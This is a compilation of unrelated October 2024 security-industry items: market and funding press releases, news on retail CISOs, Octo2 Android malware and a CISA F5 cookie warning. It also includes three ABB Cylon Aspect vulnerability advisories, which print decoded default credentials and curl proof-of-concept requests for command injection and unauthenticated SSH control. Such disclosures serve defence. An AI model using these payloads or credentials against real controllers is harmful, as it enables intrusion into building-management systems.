PRESS RELEASE

New York, United States, Oct. 10, 2024 (GLOBE NEWSWIRE) -- The Certificate Authority (CA) market is the industry dedicated to the issuing, management, and renewal of digital certificates. These digital certificates are used to authenticate the identification of entities such as websites, organizations, or individuals, as well as to secure network interactions with encryption. CAs are trusted third-party organizations that verify entities' identities and provide certificates to establish secure connections, such as SSL/TLS certificates for websites. This market is essential to the overall cybersecurity ecosystem as it maintains the security, integrity, and trustworthiness of digital communications and transactions on the Internet.

Download Free Sample Report PDF @ https://straitsresearch.com/report/certificate-authority-market/request-sample 

Market Dynamics

Focus on Cybersecurity Integration drives the global certificate authority market.

Certificate Authorities (CAs) are expanding their services to include broader cybersecurity solutions such as threat detection and identity management, resulting in more comprehensive security offerings. They collaborate with cybersecurity firms to integrate certificate management with other important security services, giving organizations an integrated and effective protection approach.

*   For instance, on 10 October 2023, DigiCert expanded its capabilities by integrating its certificate management services with Acronis' cybersecurity and data protection solutions.
    

The emergence of Blockchain Technology creates opportunities for the global certificate authority market.

Blockchain technology's decentralized and tamper-proof mechanism improves the security and transparency of digital certificate issuance and maintenance. This significant development has the potential to eliminate fraud, increase trust, and alter the certification authority market by developing more secure and efficient certificate management systems.

*   For instance, in March 2024, Tezos introduced a blockchain-based certificate management system known as Tezos DigiSign.
    

Regional Analysis

North America is the dominating region in the global certificate authority market shareholder and is anticipated to exhibit a CAGR of XX% during the forecast period. North America dominates the certificate authority market due to its modern IT infrastructure, high cybersecurity awareness, stringent regulatory environment, and the presence of major CA providers such as DigiCert and GlobalSign, which offer a wide range of digital certificate solutions. This region has strong adoption rates of digital certificates, particularly in finance, healthcare, and government.

The United States and Canada are the primary contributors to the North American certificate authority market, benefitting from their strong economies and a significant focus on cybersecurity in sectors such as banking, healthcare, e-commerce, and government services.

The Asia-Pacific (APAC) region is the fastest-growing market for certificate authorities, driven by rapid digitalization, cloud adoption, government initiatives, and significant investments in cybersecurity. Governments in China, India, and Japan are implementing policies and regulations to improve secure communication and protect sensitive data, such as China's security law, National Cyber Security Policy, and Japan's Act on the Protection of Personal Information, which is driving demand for certificate authority (CA) solutions.

These countries are major players in the APAC region, with both local and global CA providers such as CNNIC, e-Mudhra, JPRS, and DigiCert catering to a wide range of demands. The region's diverse legal frameworks and cybersecurity practices have an impact on digital certificate adoption.

Europe's certificate authority market is influenced by a wide range of regulatory standards, and a strong focus on data protection, particularly under GDPR. The market includes a mix of local and international CA providers like Entrust and Sectigo, and increasing adoption in industries including banking, telecommunications, and e-commerce. The region is distinguished for its diverse regulatory environment.

The certificate authority market in Latin America is rising and growing, due to increased digital transformation initiatives in a variety of sectors. Rising cybersecurity concerns and regulatory demands are driving the region's adoption of digital certificates.

The Middle East and Africa region is experiencing an increase in the adoption of digital certificates as businesses and governments seek to improve their cybersecurity posture. Rising digital transactions, legal restrictions, and increased data protection awareness drive the market.

To Gather Additional Insights on the Regional Analysis of the Certificate Authority Market @ https://straitsresearch.com/report/certificate-authority-market/request-sample 

Competitive Players

5.  Entrust Datacard Corporation
    

10.  WISeKey International Holding AG
    

Recent Developments

*   On 12 April 2023, Entrust Launched Zero Trust Ready Solutions for Passwordless Authentication, Next-Generation HSM, and Multi-Cloud Key Compliance
    
*   On 9 May 2023, DigiCert announced a partnership with Oracle to make DigiCert ONE, the platform for digital trust, available on Oracle Cloud Infrastructure (OCI).
    
*   On 7 March 2023, GlobalSign announced a technology partnership with essendi it to integrate Essendi's xc certificate lifecycle management (CLM) software with GlobalSign’s certificate platform, Atlas.
    
*   on 10 October 2023, DigiCert expanded its capabilities by integrating its certificate management services with Acronis' cybersecurity and data protection solutions.
    
*   In January 2023, DigiCert launched the DigiCert Trust Lifecycle Manager, a comprehensive digital trust solution designed to unify certificate management and public key infrastructure (PKI) services.
    

Segmentation

2.  By Certificate Validation Type 
    

Get Detailed Market Segmentation @ https://straitsresearch.com/report/certificate-authority-market/segmentation 

About Straits Research Pvt. Ltd.

Straits Research is a market intelligence company providing global business information reports and services. Our exclusive blend of quantitative forecasting and trends analysis provides forward-looking insight for thousands of decision-makers. Straits Research Pvt. Ltd. provides actionable market research data, especially designed and presented for decision making and ROI.

Whether you are looking at business sectors in the next town or crosswise over continents, we understand the significance of being acquainted with the client’s purchase. We overcome our clients’ issues by recognizing and deciphering the target group and generating leads with utmost precision. We seek to collaborate with our clients to deliver a broad spectrum of results through a blend of market and business research approaches.

Certificate Authority Market Size to Surpass $485M by 2033

PRESS RELEASE

SAN FRANCISCO, Oct. 10, 2024 /PRNewswire/ -- Relyance AI, the leading AI-powered data governance platform that provides complete visibility and control over enterprise-wide data, today announced a $32.1 million Series B funding round to scale operations and meet the needs of the exploding use of artificial intelligence in the enterprise. Thomvest Ventures led the round. M12, Microsoft Ventures Fund, also participated in addition to Cheyenne Ventures and existing investors Menlo Ventures and Unusual Ventures.

As demand for AI surges in the enterprise, global regulators are mandating data protection safeguards that companies find impossible to implement. At the same time, legal, security, and engineering teams are grappling with endless questions about how customer data is being used to train AI models. The impact? Executives are stifled by their inability to realize AI's innovation potential, and according to KPMG, more than two-thirds (76%) of enterprises are worried about data privacy and security when they partner with third parties. The result could be catastrophic: more than a quarter of the Fortune 500 identified AI regulation as a risk in annual reports to the SEC, and many continue to struggle with established data privacy regulations such as GDPR, which led to a record €2.1 billion in fines in 2023.

This has become a business-critical problem for all enterprises that was impossible to solve before Relyance AI's fully integrated governance platform. Until now, privacy and security have been seen as separate challenges, with one woefully unaware of the other. Privacy teams didn't know if their commitments to regulations and customers were being met, and security teams didn't know what data should be in AI models. Relyance AI marries the two into one joint solution, which is the only way to enable innovation while ensuring compliance in a rapidly evolving regulatory landscape.

"The era of accepting subpar privacy, DSPM, and AI governance solutions is over. Relyance AI sets a new standard where data protection and innovation are not mutually exclusive," said Abhi Sharma, CEO and co-founder of Relyance AI. "It's impossible to keep up with the current state of regulations, especially when GDPR, HIPAA, the EU's AI Act, and a mosaic of local U.S. privacy laws are all different and sometimes at odds. We're making it possible to demystify this and embolden the C-suite, engineers, and legal teams to urgently green-light AI in the enterprise with an integrated governance approach." 

Relyance AI safeguards businesses from fines and reputation damage while boosting customer trust to accelerate business growth. The platform provides complete visibility into enterprise-wide data processing and compares it against contractual commitments, global privacy regulations, and compliance frameworks. The company has scaled significantly to meet recent demand for these capabilities. In the first half alone, Relyance AI increased its enterprise customer base by 30%, and the company is projected to double its annual recurring revenue in 2024. Its client list now includes Coinbase, Fivetran, Verkada, Snowflake, Logitech, Plaid, and Notion.

"We're thrilled to lead the investment in Relyance AI, a unique, automated data governance platform that addresses the urgent need for real-time data visibility and compliance in a world of explosive data growth and emerging regulations," said Umesh Padval, Managing Director, Thomvest Ventures. "Relyance AI empowers Chief Privacy, Security, and Information Officers to manage data privacy and compliance, avoiding costly penalties while driving safe and responsible AI adoption. We are excited to partner with CEO Abhi Sharmaand his team, who have built a solution that transforms compliance into a competitive advantage, enabling businesses to scale AI with trust and transparency."

"The future of AI governance isn't about compliance alone – it's about building trust, transparency, and accountability into every layer of your technology," said Todd Graham, Managing Partner at M12. "Relyance AI is the catalyst for that transformation, paving the way for AI implementation that is both compliant and incredibly fast."

"With Relyance AI, we established enhanced visibility of data processing activities, seeing an impressive increase of 1,660% within three weeks of deployment," said Deborah Usry, Senior Privacy and Product Counsel at NextRoll. "What used to be a time-consuming manual process is now an automated task that produces a robust record of our processing activities."

The funding will further develop Relyance AI's platform and scale its go-to-market efforts in response to significant recent momentum. Learn more here.

About Relyance AI  
Relyance AI is the new standard for organizations trust and data governance infrastructure. Relyance AI is the only platform providing real-time visibility into how and where data is being used compared to customer agreements, global privacy regulations, and compliance frameworks. Companies of all industries and sizes – including Coinbase, Snowflake, Logitech, Plaid, Notion, and more – trust Relyance AI to safeguard businesses from fines and reputational damage and to deliver the most complete customer trust experiences.

Relyance AI Raises $32M Series B Funding to Safeguard AI Innovation in the Enterprise

ABB Cylon Aspect version 3.07.02 uses a weak set of default administrative credentials that can be guessed in remote password attacks and used to gain full control of the system.

  
ABB Cylon Aspect 3.07.02 (user.properties) Default Credentials

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller uses a weak set of default administrative  
credentials that can be guessed in remote password attacks and gain full  
control of the system.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5840  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5840.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ cat /home/MIX_CMIX/htmlroot/user.properties  
#Users  
#Mon Mar 20 13:30 EDT 2016  
guest=6775657374  
aamuser=64656661756c74

Using Utils::Hex2String in AuthSession.php:

guest:guest  
aamuser:default

ABB Cylon Aspect 3.07.02 user.properties Default Credentials

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the MODEM HTTP POST parameter called by the dialupSwitch.php script.

  
ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5839  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5839.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST "http://192.168.73.31/dialupSwitch.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -H "Content-Type: application/x-www-form-urlencoded" \   
> -d "MODEM=;echo '<?php phpinfo(); ?>'>j.php"\  
> &Submit=Save"

ABB Cylon Aspect 3.08.00 dialupSwitch.php Remote Code Execution

ABB Cylon Aspect version 3.07.02 suffers from a vulnerability that allows an unauthenticated attacker to enable or disable the SSH daemon by sending a POST request to sshUpdate.php with a simple JSON payload. This can be exploited to start the SSH service on the remote host without proper authentication, potentially enabling unauthorized access or stop and deny service access.

**ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control**

    ABB Cylon Aspect 3.07.02 (sshUpdate.php) Unauthenticated Remote SSH Service ControlVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.07.02Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The BMS/BAS controller suffers from a vulnerability that allows anunauthenticated attacker to enable or disable the SSH daemon by sending aPOST request to sshUpdate.php with a simple JSON payload. This can be exploitedto start the SSH service on the remote host without proper authentication,potentially enabling unauthorized access or stop and deny service access.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5838Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5838.phpCWE ID: 306CWE URL: https://cwe.mitre.org/data/definitions/306.html21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                $ curl -X POST "http://192.168.73.31/sshUpdate.php" \> -H "Content-Type: application/json" \> -d "{\"serviceAction\":\"start\", \"key\":\"sshenable\"}"

ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control

CISOs in consumer and retail organizations appear to accept greater risks to allow for more innovation, which could be a model for future growth.

Source: FOTOGRIN via Shutterstock

Chief information security officers (CISOs) have long borne the reputation of blocking innovation to keep their organization and all its data safe and sound.

However, those competing priorities appear to be shifting, especially in the retail and consumer sectors. While the majority of CISOs (59%) across all sectors see themselves as "enablers" — as opposed to just managers of cyber-risk — nearly all (97%) CISOs in the retail segment view their role as an enabler, according to a survey of more than 1,000 global CISOs conducted by cybersecurity firm Netskope. As a result, CISOs' acceptance of risk has grown, with the majority of all CISOs ready to take on more risk compared with five years ago. For the retail sector, the share of risk-embracing CISOs is even higher (74%).

The pressure on companies to innovate — and CISOs' understanding of their role in making that happen — are driving CISOs to become risk-takers, Netskope CISO James Robinson says.

"Typically, you had someone who was really, really technical, and they were working through things, but they really didn't have that business side of the brain — knowing the business metrics and data," he says. "CISOs have moved from the need to say no and maybe even taken it a step further — saying the answer is always, "Yes, just how do we get there?'"

From gift-card scams to brand hijacking for phishing attacks to devastating ransomware, retailers are a popular target for cybercriminals and fraudsters. At the same time, the retail sector has had to weather the chaos caused by the pandemic and supply-chain disruptions, which led to demand fluctuations and a loss of brand loyalty. The subsequent spike in inflation over the past two years left many consumers prioritizing price. Most retail executives (67%) expect consumers to purchase fewer products in 2024, and so retailers are increasingly focused on winning loyalty, according to consultancy Deloitte's "2024 US Retail Industry Outlook" report.

**Security in the Era of Amazon and AI**

With all those disruptive forces in the market, retailers have had to transform themselves to compete, morphing from just focused on selling products to becoming data companies. Consequently, CISOs at retail companies can no longer afford to focus solely on putting a wall around their information, says Netskope's Robinson.

Like other members of the C-suite, CISOs have to be thinking about the business more holistically, Robinson says.

"Retailers now have to ask, 'What's the next innovation? What's the next thing we have to do?'" he says. "And all of those decisions are data driven ... they're being led by this wealth of data that they're collecting, so that they can have targeted experiences for their customers."

Artificial intelligence is one obvious way to innovate. A great deal of the pressure to change over the past two years has come from the development of AI capabilities and businesses' fear of missing out on any innovations — and competitive advantages. In-store cameras paired with AI analysis can determine consumer interest in products, ecommerce platforms can better predict inventory, and stores can even use recognition of facial expressions to gauge consumer sentiment.

While most companies have slowly tested the waters of AI, many will be putting their first AI-powered applications into product in the next 12 months, Robinson says.

"This is the first year also that we're really seeing GenAI projects kick off, and in the next year, we'll start to really see kind of the value of some of these projects," he says. "So I think that's probably what's shaping it even more."

**The Business-Focused CISO**

Yet, AI and cybersecurity are two technology areas that are least likely to have positive returns on investments for retailers, according to consultancy KPMG's 2023 "US Consumer and Retail Sector Insights Report." Only 46% of survey respondents noted an increase in profitability or performance due to AI — and 45% from cybersecurity. But the consumer and retail sector fell even short of that threshold, with 38% and 37% of respondents, respectively, in those industries seeing a return on investment from AI or cybersecurity.

"For many consumer and retail organizations, getting data right is still a work in progress," KPMG stated in the report.

Understandably, there are still some risks where CISOs are unwilling to compromise. Sharing information with outside parties or third parties without the proper review and without the proper agreement in place — a threat becoming more common in the era of AI — is just not possible, says Robinson.

"We knew how to data warehouse, and it's got business value — even more now with the development of GenAI," he says. "I think all of those things have kind of started to come together at this point, allowing the retail CISO to really have a leg to stand on. Now they just also have kind of the business knowledge, because they're being brought into more of these conversations at this point."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Retail CISOs Take on More Risk to Foster Innovation

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This…

Octo2 malware is targeting Android devices by disguising itself as popular apps like NordVPN and Google Chrome. This advanced trojan uses sophisticated techniques to evade detection, steal credentials, and enable remote access to infected devices.

Cybersecurity researchers at DomainTools have released their new research on Octo2, a new version of the notorious Octo malware family. Octo2 targets Android mobile devices and based on its activity, researchers believe that it will target users globally soon.

According to Steve Behm, Solutions Engineer at DomainTools, Octo2 represents a major change in cybersecurity threats. This updated version of the prolific Octo (ExobotCompact) family spreads rapidly due to its enhanced features, global adoption of its predecessor, and aggressive distribution tactics. 

Octo2 features improved remote access trojan capabilities, ensuring reliable communication and control over infected devices even in challenging network conditions. Moreover, its enhanced Anti-Analysis and Anti-Detection techniques can hinder security analysis and detection, making it more difficult to identify and neutralize the threat.

In addition, the use of DGA-Based C2 server generation algorithm (DGA) to create dynamic command and control (C2) server addresses adds a layer of complexity, making it harder for security systems to track and disrupt communication.

“We were eventually able to expand the original 9 domains and 7 TLDs to 269 domains and 12 TLDs first seen from August 22nd, 2024 to October 4th, 2024,” reads DomainTool’s **blog post** shared with Hackread.com ahead of publishing on October 10, 2024.

****Currently Targeting Europe****

Early samples of Octo2 have been observed in several European countries, including Italy, Poland, Moldova, and Hungary. However, given the global reach of the original Octo and the improvements in Octo2, its distribution is expected to expand rapidly. 

****Attack Pattern** – Disguised as VPN and Browser**

The malware often disguises itself as legitimate applications, such as Google Chrome, NordVPN, or “Enterprise Europe Network,” to deceive unsuspecting users. It employs a dropper called **Zombinder** to deliver the malicious payload, prompting users to install a seemingly harmless plugin that is actually Octo2.   

For your information, Zombinder is another Android malware that was actively sold on the dark web in 2022. Its developers also offered a Windows version. At that time, Zombinder was found distributing the notorious **Xenomorph banking malware**, disguised as the VidMate app.

Once a device gets infected, Octo2 allows remote access to mobile devices, intercepting push notifications, harvesting credentials, and performing unauthorized actions, such as allowing for unauthorized login and access. The **Conficker worm discovered in 2008** is one of the earliest examples of a DGA used by malware families and so far 50 malware families, including Zeus and Dyre, have been identified to be using DGA domains.

****Abusing Domain Generation Algorithms****

Octo2’s use of a DGA (Domain Generation Algorithms – Different from **Registered Domain Generation Algorithms – RDGAs**) to generate its C2 server address is a significant enhancement. This technique allows the malware to constantly change its communication endpoints, making it more resilient to takedowns and detection efforts. While researchers can identify the patterns used to generate these domains, the dynamic nature of the C2 infrastructure presents a massive threat.  

Domain Tools researchers warn users to be cautious of Octo2 malware and avoid downloading apps or software from third-party sites. For businesses, using **threat intelligence** is important. This includes advanced detection tools like sandboxing, monitoring DNS traffic for unusual activity, and using endpoint security solutions to spot malicious behaviour on infected devices. Regular DNS traffic monitoring can also help detect DGA-based malware.

1.  **Android Malware Ajina.Banker Steals 2FA Codesvia Telegram**
2.  **BingoMod Android Malware Posing as Security Apps, Wipes Data**
3.  **SMS Stealer Targeting Android Users via Malicious Apps and Ads**
4.  **Phishing Attacks Target European Bank Users on iOS and Android**
5.  **Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos**

Octo2 Malware Uses Fake NordVPN, Chrome Apps to Infect Android Devices

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks.
It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who

Vulnerability / Network Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that it has observed threat actors leveraging unencrypted persistent cookies managed by the F5 BIG-IP Local Traffic Manager (LTM) module to conduct reconnaissance of target networks.

It said the module is being used to enumerate other non-internet-facing devices on the network. The agency, however, did not disclose who is behind the activity, or what the end goals of the campaign are.

"A malicious cyber actor could leverage the information gathered from unencrypted persistence cookies to infer or identify additional network resources and potentially exploit vulnerabilities found in other devices present on the network," CISA said in an advisory.

It has also recommended organizations encrypt persistent cookies employed in F5 BIG-IP devices by configuring cookie encryption within the HTTP profile. Furthermore, it's urging users to verify the protection of their systems by running a diagnostic utility provided by F5 called BIG-IP iHealth to identify potential issues.

"The BIG-IP iHealth Diagnostics component of the BIG-IP iHealth system evaluates the logs, command output, and configuration of your BIG-IP system against a database of known issues, common mistakes, and published F5 best practices," F5 notes in a support document.

"The prioritized results provide tailored feedback about configuration issues or code defects and provide a description of the issue, \[and\] recommendations for resolution."

The disclosure comes as cybersecurity agencies from the U.K. and the U.S. have published a joint bulletin detailing Russian state-sponsored actors' attempts to target diplomatic, defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations.

The activity has been attributed to a threat actor tracked as APT29, which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, and Midnight Blizzard. APT29 is understood to be a key cog in the Russian military intelligence machine and is affiliated with the Foreign Intelligence Service (SVR).

"SVR cyber intrusions include a heavy focus on remaining anonymous and undetected. The actors use TOR extensively throughout intrusions – from initial targeting to data collection – and across network infrastructure," the agencies said.

"The actors lease operational infrastructure using a variety of fake identities and low reputation email accounts. The SVR obtains infrastructure from resellers of major hosting providers."

Attacks mounted by APT29 have been categorized as those designed to harvest intelligence and establish persistent access so as to facilitate supply chain compromises (i.e., targets of intent), as well as those that allow them to host malicious infrastructure or conduct follow-on operations from compromised accounts by taking advantage of publicly known flaws, weak credentials, or other misconfigurations (i.e., targets of opportunity).

